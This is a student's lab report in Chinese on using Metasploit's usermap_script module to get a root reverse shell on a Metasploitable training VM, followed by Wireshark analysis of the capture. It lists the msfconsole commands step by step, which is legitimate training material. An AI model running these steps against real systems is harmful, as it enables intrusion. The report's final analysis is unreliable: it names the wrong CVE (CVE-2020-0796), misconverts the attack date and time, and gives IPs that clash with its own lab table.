20211903 2021-2022-2 《网络攻防实践》实践七报告

1.实践内容

本次实践主要学习运用Usermap_script安全漏洞对linux靶机进行渗透，并通过wireshark等软件对攻击的日志进行分析，理解其运行流程。
实践内容：

（1）使用Metasploit进行Linux远程渗透攻击

任务：使用Metasploit渗透测试软件，攻击Linux靶机上的Samba服务Usermap_script安全漏洞，获取目标Linux靶机的主机访问权限。实践步骤如下：

①启动Metasploit软件，可根据个人喜好使用msfconsole、msfgui、msfweb之一；

②使用exploit：exploit/multi/samba/usermap_script渗透攻击模块；

③选择攻击PAYLOAD为远程shell，（正向或反向连接均可）；

④设置渗透攻击参数（RHOST，LHOST，TARGET等）；

⑤执行渗透攻击；

⑥查看是否正确得到远程Shell，并查看获得的权限。

（2）实践作业：攻防对抗实践

攻击方：使用 Metasploit ，选择 Metasploitable 靶机中发现的漏洞进行渗透攻击，获得远程控制权，并尝试进一步获得root权限。

防守方：使用 tcpdump/wireshark/snort 监听获得网络攻击的数据包文件，结合 wireshark/snort 分析攻击过程，获得攻击者的IP、目标IP和端口、攻击发起时间、攻击利用漏洞、使用Shellcode、以及成功之后在命令行输入的信息。

2.实践过程

（1）使用Metasploit进行Linux远程渗透攻击
任务：使用Metasploit渗透测试软件，攻击Linux靶机上的Samba服务Usermap_script安全漏洞，获取目标Linux靶机的主机访问权限。实践步骤如下：

虚拟机	IP地址	MAC地址
kali	192.168.111.129	00:0c:29:13:9d:0f
MetaSploitable	192.168.111.128	00:0c:29:fc:b2:c3
seed_ubuntu	192.168.111.130	00:0c:29:cf:17:b9
WinXPattacker	192.168.111.131	00:0c:29:92:da:b0
Win2kServer	192.168.111.133	00:0c:29:47:20:7b

①启动Metasploit软件，可根据个人喜好使用msfconsole、msfgui、msfweb之一；
②使用exploit：exploit/multi/samba/usermap_script渗透攻击模块；
③选择攻击PAYLOAD为远程shell，（正向或反向连接均可）；
④设置渗透攻击参数（RHOST，LHOST，TARGET等）；
⑤执行渗透攻击；
⑥查看是否正确得到远程Shell，并查看获得的权限。

输入msfconsole指令，打开Metasploit软件。

使用指令info exploit/multi/samba/usermap_script，查看usermap_script安全漏洞的相关信息。

②使用exploit：exploit/multi/samba/usermap_script渗透攻击模块；

使用指令search usermap和use 0进入该漏洞的配置界面。

通过 show payloads指令查看各个攻击模块。

使用指令set PAYLOAD 18将payloads设置为payload/cmd/unix/reverse。

使用命令set RHOST 192.168.111.128设置靶机IP；使用命令set LHOST 192.168.111.129设置攻击机IP。

输入run指令开始运行漏洞，并且输入ip addr指令查看是否渗透成功，如图显示为Metasploitable靶机的ip地址，可知渗透成功。

输入shell指令打开shell界面，输入whoami指令判断当前用户信息，发现其为root权限

（2）攻防对抗实践
攻击方：使用 Metasploit ，选择 Metasploitable 靶机中发现的漏洞进行渗透攻击，获得远程控制权，并尝试进一步获得root权限。
防守方：使用 tcpdump/wireshark/snort 监听获得网络攻击的数据包文件，结合 wireshark/snort 分析攻击过程，获得攻击者的IP、目标IP和端口、攻击发起时间、攻击利用漏洞、使用Shellcode、以及成功之后在命令行输入的信息。

ping一下防御方主机，检验是否可以ping通，攻击过程如实践一，并在实践中打开wireshark，获取攻击时的记录。

如实验一获得靶机使用权后，输入进入shell界面，并输入whoami指令，发现此靶机已经获得root权限，无需进一步获得，攻击完成。

通过wireshark分析攻击方的数据包，追踪TCP流可以发现攻击方所作的行为，进入shell后，输入了ls，id，whoami等指令。

追踪另外一个数据报的TCP流，可以发现shellcode，通过这些数据报和shellcode也可以得知，攻击方ip为192.168.11.128，攻击端口为36807，靶机ip地址为192.168.11.132，端口为139。

点开数据包的详细内容可以看到攻击时间为Apr 25, 2022 07:48:50.097962275 EDT，即2022年5月25日下午7点48分。

因为攻击靶机的端口号为139且为SMB协议，所以通过百度可以得知中小型企业远程代码执行漏洞(CVE-2020-0796 )。